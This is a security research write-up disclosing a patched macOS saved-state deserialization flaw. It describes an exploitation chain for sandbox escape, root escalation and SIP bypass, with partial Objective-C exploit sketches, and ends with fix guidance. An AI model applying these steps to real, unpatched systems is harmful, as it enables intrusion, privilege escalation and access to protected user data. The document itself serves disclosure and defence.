Process injection is the ability for one process to execute code in a different process. In Windows, one reason this is used is to evade detection by antivirus scanners, for example by a technique known as DLL hijacking. This allows malicious code to pretend to be part of a different executable. In macOS, this technique can have significantly more impact than that due to the difference in permissions two applications can have.
In the classic Unix security model, each process runs as a specific user. Each file has an owner, group and flags that determine which users are allowed to read, write or execute that file. Two processes running as the same user have the same permissions: it is assumed there is no security boundary between them. Users are security boundaries, processes are not. If two processes are running as the same user, then one process could attach to the other as a debugger, allowing it to read or write the memory and registers of that other process. The root user is an exception, as it has access to all files and processes. Thus, root can always access all data on the computer, whether on disk or in RAM.
This was, in essence, the same security model macOS used until the introduction of SIP, also known as "rootless". The name doesn't mean that there is no root user anymore, but that root is now less powerful on its own. For example, certain files can no longer be read by the root user unless the process also has specific entitlements. Entitlements are metadata included when generating the code signature for an executable, and checking whether a process has a certain entitlement is an essential part of many security measures in macOS. The Unix ownership rules are still present; entitlements add a layer of permission checks on top of them. Access to certain sensitive files (e.g., the Mail.app database) and features (e.g., the webcam) is no longer possible with root privileges alone but requires an additional entitlement. In other words, privilege escalation is not enough to fully compromise the sensitive data on a Mac.
For example, using the following command we can see the entitlements of Mail.app:
These entitlements are what grant Mail.app permission to read the SIP-protected mail database, while other processes, even malware running as root, will not be able to read it.
Aside from entitlements, there are also the permissions handled by Transparency, Consent, and Control (TCC). This is the mechanism by which applications can request access to, for example, the webcam, the microphone and (in recent macOS versions) files such as those in the Documents and Downloads folders. This means that even applications that do not use the Mac Application sandbox might not have access to certain features or files.
Of course, entitlements and TCC permissions would be useless if any process could simply attach as a debugger to another process of the same user. If one application has access to the webcam and another doesn't, the second could attach to the first and inject code to steal the webcam video. To fix this, the ability to debug other applications has been heavily restricted.
Changing a security model that has been used for decades to a more restrictive model is difficult, especially in something as complicated as macOS. Attaching a debugger is just one example; there are many similar techniques that can be used to inject code into a different process. Apple has squashed many of these techniques, but many others likely remain undiscovered.
Aside from Apple's own code, these vulnerabilities can also occur in third-party software. It's quite common to find a process injection vulnerability in a specific application, which means that the permissions (TCC permissions and entitlements) of that application are up for grabs for all other processes. Getting those fixed is a difficult process, because many third-party developers are not familiar with this security model; reporting these vulnerabilities often requires fully explaining it first. Electron applications in particular are infamous for being easy to inject into, as it is possible to replace their JavaScript files without invalidating the code signature.
More dangerous than a process injection vulnerability in one application is a process injection technique that affects multiple, or even all, applications. This would give access to a large number of different entitlements and TCC permissions. A generic process injection vulnerability affecting all applications is a very powerful tool, as we'll demonstrate in this post.
The saved state vulnerability
When shutting down a Mac, it will prompt you to ask whether the currently open windows should be reopened the next time you log in. This is part of functionality called "saved state" or "persistent UI".
When reopening the windows, it can even restore new documents that were not yet saved in some applications.
Saved state is used in more places than just at shutdown. For example, it also powers a feature called App Nap. When an application has been inactive for a while (not the focused application, not playing audio, etc.), the system can tell it to save its state and then terminates the process. macOS keeps showing a static image of the application's windows, and in the Dock the application still appears to be running, even though it is not. When the user switches back to it, the application is quickly relaunched and resumes its state. Internally, this uses the same saved state functionality.
When building an application using AppKit, support for saving the state is largely automatic. In some cases the application needs to include its own objects in the saved state to ensure the full state can be recovered, for example in a document-based application.
Each time an application loses focus, it writes to the files:
The windows.plist file contains a list of all of the application's open windows. (And some other things that don't look like windows, such as the menu bar and the Dock menu.)
For example, a windows.plist for TextEdit.app could look like this:
The data.data file contains a custom binary format: a list of records, each of which contains an AES-CBC encrypted serialized object. The windows.plist file contains the key (NSDataKey) and an ID (NSWindowID) for the record in data.data it corresponds to.
For example:
00000000 4e 53 43 52 31 30 30 30 00 00 00 01 00 00 01 b0 |NSCR1000........|
00000010 ec f2 26 b9 8b 06 c8 d0 41 5d 73 7a 0e cc 59 74 |..&.....A]sz..Yt|
00000020 89 ac 3d b3 b6 7a ab 1b bb f7 84 0c 05 57 4d 70 |..=..z.......WMp|
00000030 cb 55 7f ee 71 f8 8b bb d4 fd b0 c6 28 14 78 23 |.U..q.......(.x#|
00000040 ed 89 30 29 92 8c 80 bf 47 75 28 50 d7 1c 9a 8a |..0)....Gu(P....|
00000050 94 b4 d1 c1 5d 9e 1a e0 46 62 f5 16 76 f5 6f df |....]...Fb..v.o.|
00000060 43 a5 fa 7a dd d3 2f 25 43 04 ba e2 7c 59 f9 e8 |C..z../%C...|Y..|
00000070 a4 0e 11 5d 8e 86 16 f0 c5 1d ac fb 5c 71 fd 9d |...]........\q..|
00000080 81 90 c8 e7 2d 53 75 43 6d eb b6 aa c7 15 8b 1a |....-SuCm.......|
00000090 9c 58 8f 19 02 1a 73 99 ed 66 d1 91 8a 84 32 7f |.X....s..f....2.|
000000a0 1f 5a 1e e8 ae b3 39 a8 cf 6b 96 ef d8 7b d1 46 |.Z....9..k...{.F|
000000b0 0c e2 97 d5 db d4 9d eb d6 13 05 7d e0 4a 89 a4 |...........}.J..|
000000c0 d0 aa 40 16 81 fc b9 a5 f5 88 2b 70 cd 1a 48 94 |[email protected]+p..H.|
000000d0 47 3d 4f 92 76 3a ee 34 79 05 3f 5d 68 57 7d b0 |G=O.v:.4y.?]hW}.|
000000e0 54 6f 80 4e 5b 3d 53 2a 6d 35 a3 c9 6c 96 5f a5 |To.N[=S*m5..l._.|
000000f0 06 ec 4c d3 51 b9 15 b8 29 f0 25 48 2b 6a 74 9f |..L.Q...).%H+jt.|
00000100 1a 5b 5e f1 14 db aa 8d 13 9c ef d6 f5 53 f1 49 |.[^..........S.I|
00000110 4d 78 5a 89 79 f8 bd 68 3f 51 a2 a4 04 ee d1 45 |MxZ.y..h?Q.....E|
00000120 65 ba c4 40 ad db e3 62 55 59 9a 29 46 2e 6c 07 |[email protected])F.l.|
00000130 34 68 e9 00 89 15 37 1c ff c8 a5 d8 7c 8d b2 f0 |4h....7.....|...|
00000140 4b c3 26 f9 91 f8 c4 2d 12 4a 09 ba 26 1d 00 13 |K.&....-.J..&...|
00000150 65 ac e7 66 80 c0 e2 55 ec 9a 8e 09 cb 39 26 d4 |e..f...U.....9&.|
00000160 c8 15 94 d8 2c 8b fa 79 5f 62 18 39 f0 a5 df 0b |....,..y_b.9....|
00000170 3d a4 5c bc 30 d5 2b cc 08 88 c8 49 d6 ab c0 e1 |=.\.0.+....I....|
00000180 c1 e5 41 eb 3e 2b 17 80 c4 01 64 3d 79 be 82 aa |..A.>+....d=y...|
00000190 3d 56 8d bb e5 7a ea 89 0f 4c dc 16 03 e9 2a d8 |=V...z...L....*.|
000001a0 c5 3e 25 ed c2 4b 65 da 8a d9 0d d9 23 92 fd 06 |.>%..Ke.....#...|
[...]
Whenever an application is launched, AppKit reads these files and restores the windows of the application. This happens automatically, without the app needing to implement anything. The code for reading these files is quite careful: if the application crashed, the state may be corrupted too, and if the application crashes while restoring the state, the state is discarded on the next launch and the application starts fresh.
The vulnerability we found is that the encrypted serialized object stored in the data.data file was not using "secure coding". To explain what that means, we'll first explain serialization vulnerabilities, in particular on macOS.
Serialized objects
Many object-oriented programming languages have added support for binary serialization, which turns an object into a bytestring and back. Contrary to XML and JSON, these are custom, language-specific formats. In some programming languages, serialization support for classes is automatic; in others, classes can opt in.
In many of those languages, these features have led to vulnerabilities. The problem in many implementations is that an object is created first, and only then is its type checked. Methods may be called on these objects when creating or destroying them. By combining objects in unusual ways, it is sometimes possible to gain remote code execution when a malicious object is deserialized. It is, therefore, not a good idea to use these serialization functions for any data that might be received over the network from an untrusted party.
For Python's pickle and Ruby's Marshal.load, remote code execution is straightforward. In Java (ObjectInputStream.readObject) and C#, RCE is possible if certain commonly used libraries are present; the ysoserial and ysoserial.net tools can be used to generate a payload depending on the libraries in use. In PHP, exploitability for RCE is rare.
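To make the danger concrete, here is a minimal Python pickle example. The payload is deliberately benign (it evaluates an arithmetic expression); a real exploit would substitute something like os.system for eval:

```python
import pickle

class Gadget:
    # __reduce__ tells pickle how to rebuild the object on load. Because an
    # attacker controls the serialized bytes, they choose the callable and
    # its arguments.
    def __reduce__(self):
        return (eval, ("21 * 2",))  # benign stand-in for attacker code

payload = pickle.dumps(Gadget())

# The victim merely deserializes, yet attacker-chosen code runs first,
# before any type check the caller might perform on the result.
result = pickle.loads(payload)
print(result)  # 42
```

This is exactly the "object is created first, type is checked later" problem described above: by the time the caller inspects what pickle.loads returned, the attacker's callable has already executed.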
Objective-C serialization
In Objective-C, classes can implement the NSCoding protocol to be serializable. Subclasses of NSCoder, such as NSKeyedArchiver and NSKeyedUnarchiver, can be used to serialize and deserialize these objects.
How this works in practice is as follows. A class that implements NSCoding must include a method:
-(id)initWithCoder:(NSCoder*)coder;
In this method, this object can use coder to decode its instance variables, using methods such as -decodeObjectForKey:, -decodeIntegerForKey:, -decodeDoubleForKey:, etc. When it uses -decodeObjectForKey:, the coder will recursively call -initWithCoder: on that object, eventually decoding the entire graph of objects.
Apple has also realized the risk of deserializing untrusted input, so in 10.8, the NSSecureCoding protocol was added. The documentation for this protocol states:
A protocol that enables encoding and decoding in a manner that is robust against object substitution attacks.
This means that instead of creating an object first and then checking its type, a set of allowed classes must be specified when decoding an object.
Concretely, when a secure coder is created, -decodeObjectForKey: is no longer allowed; -decodeObjectOfClass:forKey: must be used instead.
This makes exploitable vulnerabilities significantly rarer, but they can still happen. One thing to note here is that subclasses of the specified class are allowed. If, for example, the NSObject class is specified, then all classes implementing NSCoding are still allowed. And if only an NSDictionary is expected but an imported framework contains a rarely used and vulnerable subclass of NSDictionary, then that could also create a vulnerability.
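As a rough analogue, the difference is whether the class check happens before or after construction. This is a Python sketch under stated assumptions, not Apple's actual API; the class and function names are illustrative:

```python
class Benign:
    def __init__(self):
        self.safe = True

class Evil:
    constructed = False
    def __init__(self):
        # A side effect here stands in for the gadget code that runs inside
        # -initWithCoder: during a real deserialization attack.
        Evil.constructed = True

REGISTRY = {"Benign": Benign, "Evil": Evil}  # all "NSCoding-capable" classes

def decode_insecure(class_name):
    # Without secure coding: instantiate whatever class the (attacker-
    # controlled) archive names; any type check happens only afterwards.
    return REGISTRY[class_name]()

def decode_secure(class_name, allowed):
    # NSSecureCoding-style: validate the class *before* any code runs.
    # Subclasses of `allowed` pass, mirroring the caveat above.
    cls = REGISTRY[class_name]
    if not issubclass(cls, allowed):
        raise TypeError(f"{class_name} is not an allowed class")
    return cls()
```

With decode_secure, naming Evil in the archive raises a TypeError before Evil.__init__ ever runs; with decode_insecure, the constructor's side effect has already fired by the time the caller can react.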
In all of Apple's operating systems, these serialized objects are used all over the place, often for inter-process exchange of data. For example, NSXPCConnection heavily relies on secure serialization for implementing remote method calls. In iMessage, these serialized objects are even exchanged with other users over the network. In such cases it is very important that secure coding is always enabled.
Creating a malicious serialized object
In the data.data file for saved states, objects were stored using an NSKeyedArchiver without secure coding enabled. This means we could include objects of any class that implements the NSCoding protocol. The likely reason is that applications can extend the saved state with their own objects, and because the saved state functionality is older than NSSecureCoding, Apple couldn't simply upgrade it to secure coding without breaking third-party applications.
To exploit this, we wanted a method for constructing a chain of objects that could allow us to execute arbitrary code. However, no project similar to ysoserial for Objective-C appears to exist, and we could not find other examples of abusing insecure deserialization in macOS. In "Remote iPhone Exploitation Part 1: Poking Memory via iMessage and CVE-2019-8641," Samuel Groß of Google Project Zero describes an attack against a secure coder by abusing a vulnerability in NSSharedKeyDictionary, an uncommon subclass of NSDictionary. As this vulnerability is now fixed, we couldn't use it.
By decompiling a large number of -initWithCoder: methods in AppKit, we eventually found a combination of two objects that we could use to call arbitrary Objective-C methods on another deserialized object.
We start with NSRuleEditor. The -initWithCoder: method of this class creates a binding to an object from the same archive, with a key path also obtained from the archive.
Bindings are a reactive programming technique in Cocoa. They make it possible to bind a model directly to a view, without the boilerplate code of a controller. Whenever a value in the model changes, or the user makes a change in the view, the change is automatically propagated.
This binds the property binding of the receiver to the keyPath of observable. A keypath is a string that can be used, for example, to access nested properties of the object. The more common method for creating bindings, however, is as part of a XIB file in Xcode.
For example, suppose the model is a class Person with a property @property (readwrite, copy) NSString *name;. Then you could bind the "value" of a text field to the "name" keypath of a Person to create a field that shows (and can edit) the person's name.
In the XIB editor, this would be created as follows:
The different options for what a keypath can mean are actually quite complicated. For example, when binding with a keypath of βfooβ, it would first check if one the methods getFoo, foo, isFoo and _foo exists. This would usually be used to access a property of the object, but this is not required. When a binding is created, the method will be called immediately when creating the binding, to provide an initial value. It does not matter if that method actually returns void. This means that by creating a binding during deserialization, we can use this to call zero-argument methods on other deserialized objects!
In this case we use it to call -draw on the next object.
The next object we use is an NSCustomImageRep object. This obtains a selector (a method name) as a string and an object from the archive. When the -draw method is called, it invokes the method from the selector on the object. It passes itself as the first argument:
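In pseudocode, the relevant behavior looks roughly like the following (an approximate reconstruction, not Apple's actual implementation; the instance variable names are our own):

```objc
// Approximate reconstruction of the deserialized NSCustomImageRep behavior:
// both the selector string and the delegate object come from the archive.
- (void)draw {
    [_delegate performSelector:NSSelectorFromString(_drawMethodName)
                    withObject:self];
}
```

Since both the selector and the receiver are attacker-controlled, chaining this after the NSRuleEditor binding gives us an arbitrary-method-call primitive.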
By deserializing these two classes we can now call zero-argument methods and multiple-argument methods, although the first argument will be an NSCustomImageRep object and the remaining arguments will be whatever happens to still be in those registers. Nevertheless, this is a very powerful primitive. We'll cover the rest of the chain we used in a future blog post.
Exploitation
Sandbox escape
First of all, we escaped the Mac Application sandbox with this vulnerability. To explain that, some more background on the saved state is necessary.
In a sandboxed application, many files that would be stored in ~/Library are stored in a separate container instead. So instead of saving its state in:

~/Library/Saved Application State/&lt;bundle ID&gt;.savedState/

it is saved in:

~/Library/Containers/&lt;bundle ID&gt;/Data/Library/Saved Application State/&lt;bundle ID&gt;.savedState/
Apparently, when the system is shut down while an application is still running (when the prompt is shown asking the user whether to reopen the windows the next time), the first location is symlinked to the second one by talagent. We are unsure why; it might have something to do with upgrading an application to a new version which is sandboxed.
Secondly, most applications do not have access to all files. Sandboxed applications are very restricted of course, but with the addition of TCC, even accessing the Downloads, Documents, etc. folders requires user approval. If an application showed an open or save panel, it would be quite inconvenient if the user could only see the files that that application has access to. To solve this, a different process is launched when opening such a panel: com.apple.appkit.xpc.openAndSavePanelService. Even though the window itself is part of the application, its contents are drawn by openAndSavePanelService. This is an XPC service which has full access to all files. When the user selects a file in the panel, the application gains temporary access to that file. This way, users can still browse their entire disk even in applications that do not have permission to list those files.
As it is an XPC service with service type Application, it is launched separately for each app.
What we noticed is that this XPC Service reads its saved state, but using the bundle ID of the app that launched it! As this panel might be part of the saved state of multiple applications, it does make some sense that it would need to separate its state per application.
As it turns out, it reads its saved state from the location outside of the container, but with the application's bundle ID:

~/Library/Saved Application State/&lt;bundle ID&gt;.savedState/
But as we mentioned, if the app was ever open when the user shut down their computer, then this path will be a symlink into the container.
Thus, we can escape the sandbox in the following way:
If the symlink does not yet exist, wait for the user to shut down while the app is open.
Write malicious data.data and windows.plist files inside the appβs own container.
Open an NSOpenPanel or NSSavePanel.
The com.apple.appkit.xpc.openAndSavePanelService process will now deserialize the malicious object, giving us code execution in a non-sandboxed process.
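From inside the sandboxed app, these steps could look roughly like the following sketch (the construction of the malicious serialized state is omitted, and the variable names are illustrative):

```objc
#import <Cocoa/Cocoa.h>

// Sketch of the sandbox escape. NSHomeDirectory() resolves to the app's
// container when sandboxed, so this is the directory that the symlink
// outside the container points at after a shutdown with the app open.
NSString *savedStateDir = [NSString stringWithFormat:
    @"%@/Library/Saved Application State/%@.savedState",
    NSHomeDirectory(), [[NSBundle mainBundle] bundleIdentifier]];

// 1. Write the malicious serialized state (construction not shown).
[maliciousWindowsPlist writeToFile:
    [savedStateDir stringByAppendingPathComponent:@"windows.plist"]
    atomically:YES];
[maliciousDataData writeToFile:
    [savedStateDir stringByAppendingPathComponent:@"data.data"]
    atomically:YES];

// 2. Open a panel: com.apple.appkit.xpc.openAndSavePanelService launches,
//    reads the saved state under our bundle ID, and deserializes our objects
//    outside the sandbox.
[[NSOpenPanel openPanel] runModal];
```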
This was fixed earlier than the other issues, as CVE-2021-30659 in macOS 11.3. Apple addressed this by no longer loading the state from the same location in com.apple.appkit.xpc.openAndSavePanelService.
Privilege escalation
By injecting our code into an application with a specific entitlement, we can elevate our privileges to root. For this, we could apply the technique explained by A2nkF in Unauthd - Logic bugs FTW.
Some applications have an entitlement of com.apple.private.AuthorizationServices containing the value system.install.apple-software. This means that this application is allowed to install packages that have a signature generated by Apple without authorization from the user. For example, βInstall Command Line Developer Tools.appβ and βBootcamp Assistant.appβ have this entitlement. A2nkF also found a package signed by Apple that contains a vulnerability: macOSPublicBetaAccessUtility.pkg. When this package is installed to a specific disk, it will run (as root) a post-install script from that disk. The script assumes it is being installed to a disk containing macOS, but this is not checked. Therefore, by creating a malicious script at the same location it is possible to execute code as root by installing this package.
The exploitation steps are as follows:
Create a RAM disk and copy a malicious script to the path that will be executed by macOSPublicBetaAccessUtility.pkg.
Inject our code into an application with the com.apple.private.AuthorizationServices entitlement containing system.install.apple-software by creating the windows.plist and data.data files for that application and then launching it.
Use the injected code to install the macOSPublicBetaAccessUtility.pkg package to the RAM disk.
Wait for the post-install script to run.
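The RAM disk setup from the first step can be sketched as follows (the size and volume name are illustrative; hdiutil and diskutil are the standard command-line tools for this, invoked here via NSTask):

```objc
// Create a RAM disk (~100 MB: 204800 blocks of 512 bytes) to hold the
// malicious script that the package's post-install step will execute.
NSTask *attach = [[NSTask alloc] init];
attach.launchPath = @"/usr/bin/hdiutil";
attach.arguments = @[@"attach", @"-nomount", @"ram://204800"];
NSPipe *out = [NSPipe pipe];
attach.standardOutput = out;
[attach launch];
[attach waitUntilExit];

// hdiutil prints the device node (e.g. /dev/diskN) of the new RAM disk.
NSString *device = [[[NSString alloc]
    initWithData:[[out fileHandleForReading] readDataToEndOfFile]
        encoding:NSUTF8StringEncoding]
    stringByTrimmingCharactersInSet:
        [NSCharacterSet whitespaceAndNewlineCharacterSet]];

// Format it so the installer accepts it as a target volume.
NSTask *format = [[NSTask alloc] init];
format.launchPath = @"/usr/sbin/diskutil";
format.arguments = @[@"eraseVolume", @"JHFS+", @"RAMDisk", device];
[format launch];
[format waitUntilExit];

// The malicious script is then copied onto /Volumes/RAMDisk at the path
// the post-install script of macOSPublicBetaAccessUtility.pkg will run.
```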
In the writeup from A2nkF, the post-install script ran without the filesystem restrictions of SIP. It inherited this from the installation process, which needs it as package installation might need to write to SIP protected locations. This was fixed by Apple: post- and pre-install scripts are no longer SIP exempt. The package and its privilege escalation can still be used, however, as Apple still uses the same vulnerable installer package.
SIP filesystem bypass
Now that we have escaped the sandbox and elevated our privileges to root, we also wanted to bypass SIP. To do this, we looked at all available applications to find one with a suitable entitlement. Eventually, we found something on the macOS Big Sur Beta installation disk image: "macOS Update Assistant.app" has the com.apple.rootless.install.heritable entitlement. This means that this process can write to all SIP protected locations (and it is heritable, which is convenient because we can just spawn a shell). Although it is supposed to be used only during the beta installation, we can just copy it to a normal macOS environment and run it there.
The exploitation for this is quite simple:
Create malicious windows.plist and data.data files for βmacOS Update Assistant.appβ.
Launch βmacOS Update Assistant.appβ.
When exempt from SIP's filesystem restrictions, we can read all files from protected locations, such as the user's Mail.app mailbox. We can also modify the TCC database, which means we can grant ourselves permission to access the webcam, microphone, etc. We could also persist our malware in locations protected by SIP, making it very difficult to remove by anyone other than Apple. Finally, we can change the database of approved kernel extensions. This means that we could load a new kernel extension silently, without user approval. When combined with a vulnerable kernel extension (or a code signing certificate that allows signing kernel extensions), we would have been able to gain kernel code execution, which would allow disabling all other restrictions too.
Demo
We recorded the following video to demonstrate the different steps. It first shows that the application βSandboxβ is sandboxed, then it escapes its sandbox and launches βPrivescβ. This elevates privileges to root and launches βSIP Bypassβ. Finally, this opens a reverse shell that is exempt from SIPβs filesystem restrictions, which is demonstrated by writing a file in /var/db/SystemPolicyConfiguration (the location where the database of approved kernel modules is stored):
The fix
Apple first fixed the sandbox escape in 11.3, by no longer reading the saved state of the application in com.apple.appkit.xpc.openAndSavePanelService (CVE-2021-30659).
Fixing the rest of the vulnerability was more complicated. Third-party applications may store their own objects in the saved state, and these objects might not support secure coding. This brings us back to the method from the introduction: -applicationSupportsSecureRestorableState:. Applications can now opt in to requiring secure coding for their saved state by returning YES from this method. Unless an app opts in, it will keep allowing non-secure coding, which means process injection might remain possible.
This does highlight one issue with the current design of these security measures: downgrade attacks. The code signature (and therefore entitlements) of an application will remain valid for a long time, and the TCC permissions of an application will still work if the application is downgraded. A non-sandboxed application could just silently download an older, vulnerable version of an application and exploit that. For the SIP bypass this would not work, as βmacOS Update Assistant.appβ does not run on macOS Monterey because certain private frameworks no longer contain the necessary symbols. But that is a coincidental fix, in many other cases older applications may still run fine. This vulnerability will therefore be present for as long as there is backwards compatibility with older macOS applications!
Nevertheless, if you write an Objective-C application, please make sure you implement -applicationSupportsSecureRestorableState: to return YES, and adopt secure coding for all classes used in your saved state!
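For a Cocoa app, opting in is a one-method addition to the application delegate:

```objc
// Opt in to requiring NSSecureCoding for restorable window state.
// All classes archived in the saved state must then conform to
// NSSecureCoding, or restoration will reject them.
- (BOOL)applicationSupportsSecureRestorableState:(NSApplication *)app {
    return YES;
}
```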
Conclusion
In the current security architecture of macOS, process injection is a powerful technique. A generic process injection vulnerability can be used to escape the sandbox, elevate privileges to root, and bypass SIP's filesystem restrictions. We have demonstrated how we used insecure deserialization in the loading of an application's saved state to inject code into any Cocoa process. This was addressed by Apple in the macOS Monterey update.